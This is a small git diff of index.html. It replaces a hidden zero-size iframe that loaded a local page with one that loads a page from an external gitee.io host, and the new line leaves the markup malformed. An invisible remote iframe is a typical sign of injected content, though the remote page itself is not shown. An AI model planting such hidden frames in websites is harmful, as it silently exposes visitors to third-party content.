--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
 <body>
    
     
-   <iframe src="./0gg.html" width="0" height="0"></iframe>
+ <iframe src="https://ktv98.gitee.io./0gg.html" width="0" height="0"></iframe></body>
 
    </body>
 <html>
